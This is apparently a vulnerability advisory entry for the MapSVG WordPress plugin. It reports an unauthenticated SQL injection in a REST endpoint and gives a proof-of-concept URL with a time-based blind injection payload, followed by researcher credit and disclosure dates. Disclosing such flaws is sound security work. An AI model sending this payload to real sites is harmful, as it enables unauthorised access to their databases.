The plugin does not validate and escape a parameter via a REST endpoint before using it in a SQL statement, leading to a SQL Injection exploitable by unauthenticated users.
https://example.com/wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--+
Brandon James Roldan
Brandon James Roldan
Yes
2022-04-18 (about 1 years ago)
2022-04-18 (about 1 years ago)
2022-04-19 (about 1 years ago)